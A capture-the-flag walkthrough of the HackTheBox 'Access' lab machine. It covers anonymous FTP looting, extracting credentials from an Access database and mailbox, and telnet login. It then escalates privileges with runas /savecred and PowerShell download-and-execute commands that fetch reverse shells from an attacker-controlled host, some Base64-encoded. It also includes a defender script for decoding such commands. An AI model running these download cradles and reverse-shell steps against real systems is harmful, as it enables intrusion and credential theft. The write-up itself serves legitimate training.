
# HackTheBox - Access

![](/files/-MY3iU2D7bhkud_zX8Eu)

### Nmap scan results (basic and all ports)

![](/files/-MY3ik6G6N40rw41qaF4)

```
nmap -sC -sV -oA nmap-access 10.10.10.98
```

![](/files/-MY3jcRaHU82aA2JfpVl)

### FTP Enumeration

Anonymous FTP access is allowed, so we can download all the files present in that share.

![](/files/-MY3koKJbXxz6eTMWadH)

We now have the `AccessControl.zip` and `backup.mdb` files from the FTP server.

> A file with the **MDB** file extension is a Microsoft Access Database file that literally stands for Microsoft Database. ... **MDB** files contain database queries, tables, and more that can be used to link to and store data from other files, like XML and HTML, and applications, like Excel and SharePoint.

### Exploring mdbtools

```
apt-get install mdbtools
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 # Downloading all the files
```

The first command installs mdbtools, which we need to analyze the `backup.mdb` file, and the second mirrors every file from the FTP server.

We can list all the tables using the `mdb-tables` or `mdb-sql` command.

Using mdb-tables:

![](/files/-MY3pyXltmMTaoI9BfLf)

Using mdb-sql:

![](/files/-MY3q743ICITBbF0l0se)

To extract the information from the tables, we can use `mdb-json`.

```
# -1 prints one table name per line, so names containing spaces survive the loop
mdb-tables -1 backup.mdb | while read -r t; do mdb-json backup.mdb "$t"; done
```

![](/files/-MY3qLocpDh0oI287_pK)

The password for the zip file is stored inside this `backup.mdb` file, and we can search for it.

![](/files/-MY3qkkJaP0K0q9qEu05)

![](/files/-MY3rXhrfL1O8m25LYiE)

### Analyzing .pst file using readpst

We can convert the .pst file into a human-readable .mbox file using the `readpst` command.

![](/files/-MY3y2EJ9J25MEerioGm)

![](/files/-MY3yVUwN38pX28U7xyt)

### Using Telnet to get shell access

Password for the security account is changed to `4Cc3ssC0ntr0ller`

We can use telnet to get shell access as the security user.

![](/files/-MY3z8XSGx8rfv8CZtsL)

This shell is not really stable, and we need a stable shell for further enumeration, so we will use the Nishang shells from [GitHub](https://github.com/samratashok/nishang/tree/master/Shells).

![](/files/-MY3zopyAAIXs1jKZSLB)

```
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/shell.ps1')"
```

Make sure to add this line at the end of the script so that it runs as soon as the script is downloaded to the target computer.

![](/files/-MY4-knmwY190aEB4y_H)

![](/files/-MY4-oxSR37QGglkLKaQ)

### Running JAWS script for system enumeration

```
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/jaws-enum.ps1')
```

![](/files/-MY43Xtl-JpMaL7U65m-)

![Keep this in mind: cmdkey /list ](/files/-MY43xx0UEkRqmKrc5EV)

We find a very interesting file under `C:\Users\Public\Desktop`.

![](/files/-MY44cEOdDHGeMKBm7Rg)

### Privilege Escalation

We can view the raw contents of the file using the `Get-Content` command in PowerShell, or we can parse the shortcut through the `WScript.Shell` COM object.

```
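# Parse the .lnk through the WScript.Shell COM object to see its target and arguments
$WScript = New-Object -ComObject WScript.Shell
$shortcut = Get-ChildItem *.lnk | Select-Object -First 1
$WScript.CreateShortcut($shortcut.FullName)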
```

![](/files/-MY45ELs49VbxlAEANgp)

We can run this command as Administrator, so we will try to get a reverse shell using this.

![](/files/-MY47dNxhrqiUHcgQZWt)

We changed the port to 9002 since we already have a connection on port 9001. Now we need to use a Base64-encoded string to run the Windows commands.

```
echo "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/shell2.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
```

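PowerShell's `-EncodedCommand` expects a Base64 string of UTF-16 Little Endian text, so we convert the command with `iconv` first and then pipe it through `base64`. The `-w` flag sets the column at which output is wrapped (`wrap encoded lines after COLS character`); `-w 0` disables wrapping so the result is a single line.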

```
runas /user:ACCESS\Administrator /savecred "Powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADIAOgA4ADAAMAAwAC8AcwBoAGUAbABsADIALgBwAHMAMQAnACkACgA="
```
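
For defenders reviewing process-creation logs, the same encoding can be reversed to recover what an `-EncodedCommand` invocation ran. The following is an added example, not part of the original writeup: the function names and the first sample line are constructed, and the second sample line is the `runas` command shown above.

```python
import base64
import binascii
import re

# -EncodedCommand may be abbreviated to any prefix (-e, -enc, ...) or to -ec.
FLAG = re.compile(r"[-/](e[a-z]*)\s+[\"']?([A-Za-z0-9+/]{8,}={0,2})", re.I)
# Indicators taken from the commands shown on this page.
INNER = ("iex", "invoke-expression", "downloadstring", "net.webclient")
# Constructed process-creation command lines; the second is the runas command from this page.
SAMPLE = [
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    r'runas /user:ACCESS\Administrator /savecred "Powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADIAOgA4ADAAMAAwAC8AcwBoAGUAbABsADIALgBwAHMAMQAnACkACgA="',
]


def decode_encoded_command(cmdline):
    """Return the decoded PowerShell script from a command line, or None."""
    for flag, blob in FLAG.findall(cmdline):
        name = flag.lower()
        if not ("encodedcommand".startswith(name) or name == "ec"):
            continue  # some other switch, e.g. -ExecutionPolicy
        try:
            raw = base64.b64decode(blob, validate=True)
            return raw.decode("utf-16-le").strip()
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64, or not UTF-16LE text
    return None


def triage(cmdline):
    """Decode one process command line and list the reasons it is suspicious."""
    reasons = []
    lowered = cmdline.lower()
    if "runas" in lowered and "/savecred" in lowered:
        reasons.append("runas with stored credentials (/savecred)")
    script = decode_encoded_command(cmdline)
    if script is not None:
        reasons.append("encoded PowerShell command")
        reasons += [f"decoded script contains {m}" for m in INNER if m in script.lower()]
    return script, reasons


if __name__ == "__main__":
    for line in SAMPLE:
        script, reasons = triage(line)
        print(reasons, "->", script)
```

Process-creation events with command-line logging enabled are the natural input for a check like this.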

![](/files/-MY49WxW9jf6jAgF-vge)

{% hint style="info" %}
Note: To read all the recently cracked hashes, we can use the following command: `cat ~/.john/john.pot`
{% endhint %}
